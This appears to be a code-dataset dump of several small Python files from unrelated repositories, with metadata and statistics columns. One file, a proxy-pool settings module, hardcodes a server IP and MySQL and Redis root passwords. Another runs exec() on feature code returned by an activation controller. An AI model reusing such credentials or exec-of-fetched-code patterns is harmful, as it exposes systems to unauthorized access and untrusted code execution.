| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
77d36464bd4d49e3020b4c083cd21a208fedd75a
| 225
|
py
|
Python
|
misago/misago/graphql/admin/tests/conftest.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | 2
|
2021-03-06T21:06:13.000Z
|
2021-03-09T15:05:12.000Z
|
misago/misago/graphql/admin/tests/conftest.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
misago/misago/graphql/admin/tests/conftest.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
import pytest
from django.urls import reverse
from ...test import GraphQLTestClient
@pytest.fixture
def admin_graphql_client(admin_client):
return GraphQLTestClient(admin_client, reverse("misago:admin:graphql:index"))
| 22.5
| 81
| 0.813333
| 28
| 225
| 6.392857
| 0.571429
| 0.134078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102222
| 225
| 9
| 82
| 25
| 0.886139
| 0
| 0
| 0
| 0
| 0
| 0.115556
| 0.115556
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 5
|
77f7c60ba8c49ec29ff69b45928966af5755a776
| 153
|
py
|
Python
|
video_classification/models/__init__.py
|
gpostelnicu/video_classification
|
ac8cf0b1a3365ec42ec92fd8b3ad946c6e5c8e15
|
[
"MIT"
] | null | null | null |
video_classification/models/__init__.py
|
gpostelnicu/video_classification
|
ac8cf0b1a3365ec42ec92fd8b3ad946c6e5c8e15
|
[
"MIT"
] | null | null | null |
video_classification/models/__init__.py
|
gpostelnicu/video_classification
|
ac8cf0b1a3365ec42ec92fd8b3ad946c6e5c8e15
|
[
"MIT"
] | null | null | null |
from .decoder import Decoder
from .encoder import ResnetEncoder
from .factory import get_model_by_name
from .resnet_lstm import ResnetLstm, count_params
| 30.6
| 49
| 0.856209
| 22
| 153
| 5.727273
| 0.681818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 153
| 4
| 50
| 38.25
| 0.926471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
ae01fc6a56fdee3f32c2f3e77c8b72e91dcc1d0a
| 2,693
|
py
|
Python
|
proxypool/proxypool/proxypool/LosmliProxyPool/settings/default_settings.py
|
yhr-git/study_git
|
b509dcc2195c8fab02d4c16a9299f6ba26a192e8
|
[
"MIT"
] | null | null | null |
proxypool/proxypool/proxypool/LosmliProxyPool/settings/default_settings.py
|
yhr-git/study_git
|
b509dcc2195c8fab02d4c16a9299f6ba26a192e8
|
[
"MIT"
] | null | null | null |
proxypool/proxypool/proxypool/LosmliProxyPool/settings/default_settings.py
|
yhr-git/study_git
|
b509dcc2195c8fab02d4c16a9299f6ba26a192e8
|
[
"MIT"
] | null | null | null |
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
USER_AGENTS_LIST = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'
]
# 爬取后第一次检验
HTTPBIN_CHECK_URL = 'http://httpbin.org/ip'
# CHECK_URL = 'https://www.google.com/'
# CHECK_URL = 'https://www.alibaba.com/'
# 对特定网站验证proxy可用性
AMAZON_CHECK_URL = 'https://www.amazon.com/'
# 过滤代理
CLIENT_IP = '172.105.220.160'
# MySQL配置
MYSQL_HOST = '172.105.220.160'
MYSQL_PORT = 3306
MYSQL_USER = 'root'
MYSQL_PASSWORD = 'hb_root123456'
MYSQL_DB = 'proxypool'
# redis配置
REDIS_HOST = '172.105.220.160'
REDIS_PORT = 6379
REDIS_PASSWORD = 'hb_root123456'
REDIS_DB = 1
# redis key
PROXY_WAIT_CHECK_HTTPBIN = 'proxyWaitCheckHttpbin'
PROXY_IS_VAILD_HTTPBIN = 'proxyIsVaildHttpbin'
PROXY_WAIT_CHECK_AMAZON = 'proxyWaitCheckAmazon'
PROXY_IS_VAILD_AMAZON = 'proxyIsVaildAmazon'
# 最大并发量
MAX_CONCURRENT = 50
PROXY_FILE = os.path.join(BASE_DIR, 'list.txt')
| 47.245614
| 122
| 0.717044
| 467
| 2,693
| 4.049251
| 0.229122
| 0.079323
| 0.071391
| 0.126917
| 0.678477
| 0.644632
| 0.644632
| 0.644632
| 0.644632
| 0.625595
| 0
| 0.203138
| 0.124397
| 2,693
| 56
| 123
| 48.089286
| 0.598813
| 0.051244
| 0
| 0
| 0
| 0.405405
| 0.753635
| 0.008251
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.054054
| 0.027027
| 0
| 0.027027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
7af0ca5f9ba1d7ef7209dbd8ee8cdbc2d3865c16
| 250
|
py
|
Python
|
classifier/models/effnet.py
|
bendikbo/SSED
|
fdd0e74d419687bc8cba65341d7248ca6ccd1a4e
|
[
"MIT"
] | null | null | null |
classifier/models/effnet.py
|
bendikbo/SSED
|
fdd0e74d419687bc8cba65341d7248ca6ccd1a4e
|
[
"MIT"
] | null | null | null |
classifier/models/effnet.py
|
bendikbo/SSED
|
fdd0e74d419687bc8cba65341d7248ca6ccd1a4e
|
[
"MIT"
] | null | null | null |
#The effcientnet_pytorch package is licensed under LGPL V3
#License can be found in the subdir "LICENSES"
from efficientnet_pytorch import EfficientNet
def effnet(cfg):
return EfficientNet.from_pretrained(cfg.NAME, num_classes=cfg.NUM_CLASSES)
| 31.25
| 78
| 0.82
| 36
| 250
| 5.555556
| 0.75
| 0.1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004566
| 0.124
| 250
| 7
| 79
| 35.714286
| 0.908676
| 0.408
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 5
|
bb4d1d4ec712336b542134fc4df6127ae0b6abc7
| 80
|
py
|
Python
|
server/log.py
|
codingchili/lifx-circadian
|
511488681c0745fd2c3122354ea0451d1a64fff8
|
[
"MIT"
] | 2
|
2020-01-14T12:31:05.000Z
|
2022-01-06T17:24:14.000Z
|
server/log.py
|
codingchili/lifx-circadian
|
511488681c0745fd2c3122354ea0451d1a64fff8
|
[
"MIT"
] | 14
|
2019-11-21T17:55:12.000Z
|
2019-12-01T20:15:26.000Z
|
server/log.py
|
codingchili/lifx-circadian
|
511488681c0745fd2c3122354ea0451d1a64fff8
|
[
"MIT"
] | null | null | null |
import time
def log(line):
print(time.strftime('%H:%M:%S') + ' > ' + line)
| 16
| 51
| 0.55
| 12
| 80
| 3.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 80
| 5
| 51
| 16
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0.135802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
2475b817ccae80859885a1e431d955da7858cfb0
| 534
|
py
|
Python
|
tests/test_subscriptableclass_approach.py
|
mjendersgyg/TypedPyspark
|
cf58624bceb2b2e122b8cb24901453c98efd2356
|
[
"Apache-2.0"
] | 3
|
2021-12-09T08:58:57.000Z
|
2022-02-03T12:53:55.000Z
|
tests/test_subscriptableclass_approach.py
|
mjendersgyg/TypedPyspark
|
cf58624bceb2b2e122b8cb24901453c98efd2356
|
[
"Apache-2.0"
] | null | null | null |
tests/test_subscriptableclass_approach.py
|
mjendersgyg/TypedPyspark
|
cf58624bceb2b2e122b8cb24901453c98efd2356
|
[
"Apache-2.0"
] | 1
|
2022-03-28T12:43:18.000Z
|
2022-03-28T12:43:18.000Z
|
from pyspark.sql import SparkSession
from typed_pyspark import DataFrame
phone = str
url = str
def test_with_spark():
df_names = DataFrame["phone", "url", ...]
spark = SparkSession.builder.getOrCreate()
df = spark.createDataFrame([{"phone": "1233125"}])
def test(df: df_names) -> DataFrame["phone", "url"]:
return df
test(df)
def test_first():
df_names = DataFrame["phone", "url", ...]
def test(df: df_names) -> DataFrame["phone", "url"]:
return DataFrame()
test(DataFrame())
| 19.777778
| 56
| 0.632959
| 64
| 534
| 5.15625
| 0.34375
| 0.212121
| 0.193939
| 0.254545
| 0.381818
| 0.236364
| 0.236364
| 0.236364
| 0.236364
| 0
| 0
| 0.016548
| 0.207865
| 534
| 26
| 57
| 20.538462
| 0.763593
| 0
| 0
| 0.25
| 0
| 0
| 0.082397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.125
| 0.125
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 5
|
2477f7f753604e256b5a37a04aeba572c0063501
| 256
|
py
|
Python
|
discounts/src/exceptions/exceptions.py
|
dalmarcogd/mobstore
|
0b542b9267771a1f4522990d592028dc30ee246f
|
[
"Apache-2.0"
] | null | null | null |
discounts/src/exceptions/exceptions.py
|
dalmarcogd/mobstore
|
0b542b9267771a1f4522990d592028dc30ee246f
|
[
"Apache-2.0"
] | null | null | null |
discounts/src/exceptions/exceptions.py
|
dalmarcogd/mobstore
|
0b542b9267771a1f4522990d592028dc30ee246f
|
[
"Apache-2.0"
] | null | null | null |
class UserNotFoundException(Exception):
pass
class ProductNotFoundException(Exception):
pass
class UnrecognizedEventType(Exception):
pass
class UnrecognizedEventOperation(Exception):
pass
class UnrecognizedArgs(Exception):
pass
| 13.473684
| 44
| 0.773438
| 20
| 256
| 9.9
| 0.4
| 0.328283
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167969
| 256
| 18
| 45
| 14.222222
| 0.929577
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
2480d38d361ab252237b6e4282cde75fed35e477
| 162
|
py
|
Python
|
netmiko/alliedtelesis/__init__.py
|
Rawrroar/netmiko
|
5477580e168f79571920b61e718d0a8781b39dbb
|
[
"MIT"
] | null | null | null |
netmiko/alliedtelesis/__init__.py
|
Rawrroar/netmiko
|
5477580e168f79571920b61e718d0a8781b39dbb
|
[
"MIT"
] | null | null | null |
netmiko/alliedtelesis/__init__.py
|
Rawrroar/netmiko
|
5477580e168f79571920b61e718d0a8781b39dbb
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from netmiko.alliedtelesis.awplus_ssh import AWplusSSH, AWplusFileTransfer
__all__ = ["AWplusSSH", "AWplusFileTransfer"]
| 32.4
| 74
| 0.845679
| 16
| 162
| 7.9375
| 0.75
| 0.425197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08642
| 162
| 4
| 75
| 40.5
| 0.858108
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
249adc4109ce80d8c4201dd89380eab313ed0ea9
| 119
|
py
|
Python
|
insomniac/extra_features/action_register_accounts.py
|
chikko80/Insomniac
|
2d49a6d4e5a15eb63bddd9aace3cc872cf40b01a
|
[
"MIT"
] | null | null | null |
insomniac/extra_features/action_register_accounts.py
|
chikko80/Insomniac
|
2d49a6d4e5a15eb63bddd9aace3cc872cf40b01a
|
[
"MIT"
] | null | null | null |
insomniac/extra_features/action_register_accounts.py
|
chikko80/Insomniac
|
2d49a6d4e5a15eb63bddd9aace3cc872cf40b01a
|
[
"MIT"
] | null | null | null |
from insomniac import activation_controller
exec(activation_controller.get_extra_feature("action_register_accounts"))
| 29.75
| 73
| 0.890756
| 14
| 119
| 7.142857
| 0.857143
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05042
| 119
| 3
| 74
| 39.666667
| 0.884956
| 0
| 0
| 0
| 0
| 0
| 0.201681
| 0.201681
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
24a87274ca8edb259e3599922d6f2f91ff2cbfb3
| 83
|
py
|
Python
|
test/testFunctionError.py
|
qwazwsx/pytalk
|
29115e3f8903551de56476c102bb5f340bb0e285
|
[
"MIT"
] | null | null | null |
test/testFunctionError.py
|
qwazwsx/pytalk
|
29115e3f8903551de56476c102bb5f340bb0e285
|
[
"MIT"
] | null | null | null |
test/testFunctionError.py
|
qwazwsx/pytalk
|
29115e3f8903551de56476c102bb5f340bb0e285
|
[
"MIT"
] | null | null | null |
import math
@pytalk_method('factorial')
def fact(n):
return math.factorial(n / 0)
| 16.6
| 29
| 0.73494
| 13
| 83
| 4.615385
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013699
| 0.120482
| 83
| 5
| 29
| 16.6
| 0.808219
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
24b9349695d31b6b06e6ad0a4cb644dfe9939a58
| 6,234
|
py
|
Python
|
tests/test_hsrp.py
|
codezinfiniti/HAP-python
|
c5a18c66e2a1e130c5ec40f252878f7449acaad4
|
[
"Apache-2.0"
] | 462
|
2017-10-14T16:58:36.000Z
|
2022-03-24T01:40:23.000Z
|
tests/test_hsrp.py
|
codezinfiniti/HAP-python
|
c5a18c66e2a1e130c5ec40f252878f7449acaad4
|
[
"Apache-2.0"
] | 371
|
2017-11-28T14:00:02.000Z
|
2022-03-31T21:44:07.000Z
|
tests/test_hsrp.py
|
codezinfiniti/HAP-python
|
c5a18c66e2a1e130c5ec40f252878f7449acaad4
|
[
"Apache-2.0"
] | 129
|
2017-11-23T20:50:28.000Z
|
2022-03-17T01:26:53.000Z
|
"""Tests for pyhap.hsrp."""
# pylint: disable=line-too-long, pointless-string-statement
import hashlib
from pyhap.hsrp import Server
from pyhap.params import get_srp_context
from pyhap.util import long_to_bytes
DUMMY_A = b"Ve\xce\xd4\x90LExKD\x9d7\x16\\@\xb6\xb8\x9f\x01\x1a]\x86\xa4\x1c"
" \x13\xaa\xc0\x17=\x1f\xafPx\xea/\x01Q\xc8hw\x06\x03\xc8O\x89|\x8d4\xa8\x85"
"\xd2\xfb:\x0e\xb6PT2V\xb2\xa9\xca\x0bL\x97\r\xee\x88\xbc\xef\x8d\xa6|\xeb \xdc"
"\x80.\x92\xe0\xe5s\xf5\xf2;\x89LN\\^\x8c\xd1\x00\x99U]]/^\xe9\x1b\xe2\xf3\x1a|"
"\xc6\x85Q\x95T`b\x8e\x04\xc2\x99\xdd\xdfp\x98\x85\x13\xe5\xaf\xdf\xe0Tm\xa3t\xfe"
"\xc1_V\x04\xab\xb1\x96\xa8\x9cw\xa40\x95\x8d\x9f|\xf7.\x90\xd2{L\xcc*\xcb\xdde"
"\x81\x14\x14\xc97\xe7\xa0177\x1b\xe0\xb0\x19\x0f\xf1\x1e;\xc4\xc9\x07\x05zN\xb3"
"!y\xf2\x9e\xa4N\xbeswxx\x13\x82\x18\xccU\xb4\xec\x7f{\x8eo\x86\x0b\xa6\xff\x9b"
"\xbcY(0\x16\xba$\x9d\xb9\x8d}\xe5f\x0c)\\\x8b\\\xef\xfd\x0coEg\x13\x13\xa2q\xb9"
"\xe5\x8a\xfd\x97\x97\xcb\xb1\x15\xd5\xc2\xd7\x07\x91A\xdf\xd7"
def test_srp_basic():
ctx = get_srp_context(3072, hashlib.sha512, 16)
b = 191304991611724068381190663629083136274
s = long_to_bytes(227710976386754876301088769828140156049)
verifier = Server(ctx, b"Pair-Setup", b"123-45-543", s=s, b=b)
verifier.set_A(DUMMY_A)
assert (
verifier.k
== 8891118944006259431156568541843809053371474718154946070525699599564743247786811275097952247025117806925219847643897478119979876683245412022290811230509536
)
assert (
verifier.get_session_key()
== 7776966363435436003301596680621751479448170893927097125414524508260409807602643597201957531811064094375727460485526402929080964822225092649470633176208468
)
assert (
verifier.M
== b"\xafnZ\xef\x8e\x84\xbe\xaa\xe2M}5'\x0c\xb8\xb9\x07\x13\xa3t\xbbfOL\x059\xa3T\xaf\x021\x05\xf7*\xdb]\xa3]\x92\xbc\xa7\x0ed\xc1C\x88W\x0b\xe7n\xe6|\x1e\xb4\xf9pUc\xa2\x8d\x05\xd7\xabI"
)
assert (
verifier.S
== 74327940101639752536537640881643581886247890122995727869092918508085397047960192114187184206420245499227933354038262980545757154896143196917567791395562849790585173129051928488506985432588320936161016609993624725221069849383124728580710793131421162926844621384309691065416908669855286020750380619018007734494245389837285359061649585082978114606737696983003789452193299203880220013003551748645087934186574940836315605161763958706985646740794424371115818479937015467439653789667600114913036877616558029128521276071759153575011083182650027094873442901697309464533625147028860476977419766721379872518101123122550406587162809198793634217353529574423908555799363233330194347012490634061830786590780000201696990820985363093141614397601285773980430681705777477946555312165250133963931282621724675380164859592461132141730419315498467050491890312826221069184134326282895963295397215898192608240385050625017941322853973472354023693355
)
assert verifier.get_challenge() == (
s,
2149981971605054722971448928513305504744266471818820776094113337432031877014471028912971746321748621185649001880451734094103311676264091997241948096711710461140721738956497494552388614895831596671069609694220554015991913746528757304239759620571367574036184864989138266792823575841594621160010011666017298902208272126405229578664943728094068949021795802799552486045670159066273942547651088762352104942364707580142387716636468281068738042936130578774565386637668610429058884417819388838110075674266297699354845325023954873162742733169560666501210723876454859556564325607870517213063038111644227553599978606540729093082921723443122696487068510228710655880466038292327450357013882323502992655150615829432843408599038481983277372215619348128412279375677793332715557041679298014663382481619951610899087031959653365603032111634191603851554865349816117884573658915813848292512124719015181912892538210471183790840676306564839828444134,
)
assert verifier.b == b
assert (
verifier.v
== 1800954445588585461785592179273284825501707649217210015435034845050179016324355419526711292364866248346582448660643272322280999760562622718989053886869428917425675795172391329924178337579968214001782222575897907780437717763112406095878356902641567396545009429496128133564692965499069074320017151157469160990771527712530637370897276672652870613312504255873634362188551282649472569433062597795005057270622772410668342950279555516133010272639201733492626622809480021268951287298118968011031850511105359580984350020671780470982743318615303989055956125558514263378948829479434245711743458681522240763520911255733079164391662778946744155477806679057949726211652108387739564473209550264487697151825509058193841809273482575660658239177704074882302955007248950743262054925817705066654613816236610736311934089570249355454459951577900707115340781119430461780455828980205046091360390327787803271426555681638302650021637121212829077894589
)
assert (
verifier.N
== 5809605995369958062791915965639201402176612226902900533702900882779736177890990861472094774477339581147373410185646378328043729800750470098210924487866935059164371588168047540943981644516632755067501626434556398193186628990071248660819361205119793693985433297036118232914410171876807536457391277857011849897410207519105333355801121109356897459426271845471397952675959440793493071628394122780510124618488232602464649876850458861245784240929258426287699705312584509625419513463605155428017165714465363094021609290561084025893662561222573202082865797821865270991145082200656978177192827024538990239969175546190770645685893438011714430426409338676314743571154537142031573004276428701433036381801705308659830751190352946025482059931306571004727362479688415574702596946457770284148435989129632853918392117997472632693078113129886487399347796982772784615865232621289656944284216824611318709764535152507354116344703769998514148343807
)
assert verifier.g == 5
assert (
verifier.verify(verifier.M)
== b"\xe1\x00\xcf\xe2\x98\xaf\x1e\x02tb\x0b\xfclKF\xee\x1b\x80\xf6\x90\xb7\x8a\x9f\x133y#>\x8d/\xc1\x88\x93\x8eh\tN\x9b\xda\xc2-\x1a(\xe3\xca\x0bf\xf3\xc4\xca\xc4\xec\xfa/\xec\xb7\x16\x81\xdd%\xc9i\xf9\x90"
)
assert verifier.verify(b"wrong") is None
| 93.044776
| 936
| 0.874398
| 383
| 6,234
| 14.18799
| 0.613577
| 0.02834
| 0.004785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.744052
| 0.056144
| 6,234
| 66
| 937
| 94.454545
| 0.17947
| 0.012833
| 0
| 0.127273
| 0
| 0.218182
| 0.188029
| 0.182986
| 0
| 1
| 0
| 0
| 0.2
| 1
| 0.018182
| false
| 0
| 0.072727
| 0
| 0.090909
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
24ec5f5b67f123b1ab51709306df44fcc5a007e2
| 47
|
py
|
Python
|
bot 3.3.5a/ckl.py
|
Khufos/Bot-de-pesca-wow-3.3.5a
|
d3dbba8863190994e085504c3451a45c8501cdf5
|
[
"MIT"
] | 1
|
2022-02-19T22:01:03.000Z
|
2022-02-19T22:01:03.000Z
|
bot 3.3.5a/ckl.py
|
Khufos/Bot-de-pesca-wow-3.3.5a
|
d3dbba8863190994e085504c3451a45c8501cdf5
|
[
"MIT"
] | null | null | null |
bot 3.3.5a/ckl.py
|
Khufos/Bot-de-pesca-wow-3.3.5a
|
d3dbba8863190994e085504c3451a45c8501cdf5
|
[
"MIT"
] | 1
|
2022-02-19T22:01:07.000Z
|
2022-02-19T22:01:07.000Z
|
import pyautogui as pag
pag.click('acpt2.png')
| 15.666667
| 23
| 0.765957
| 8
| 47
| 4.5
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02381
| 0.106383
| 47
| 3
| 24
| 15.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.191489
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
70000fb558bd148478010379ad8aa43e16ebe478
| 31
|
py
|
Python
|
python/testData/resolve/multiFile/fromNamespacePackageImportModule/FromNamespacePackageImportModule.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/resolve/multiFile/fromNamespacePackageImportModule/FromNamespacePackageImportModule.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/resolve/multiFile/fromNamespacePackageImportModule/FromNamespacePackageImportModule.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from p1 import m1
m1()
#<ref>
| 6.2
| 17
| 0.612903
| 6
| 31
| 3.166667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0.225806
| 31
| 4
| 18
| 7.75
| 0.666667
| 0.16129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
70953de039cf2a60952ffdd71cfb923ff3f27d14
| 115
|
py
|
Python
|
api/main.py
|
Herikc2/IoT-Previsao-de-Uso-de-Energia
|
a480ad92d83480b3e0b445355e79307ce01deb1d
|
[
"MIT"
] | null | null | null |
api/main.py
|
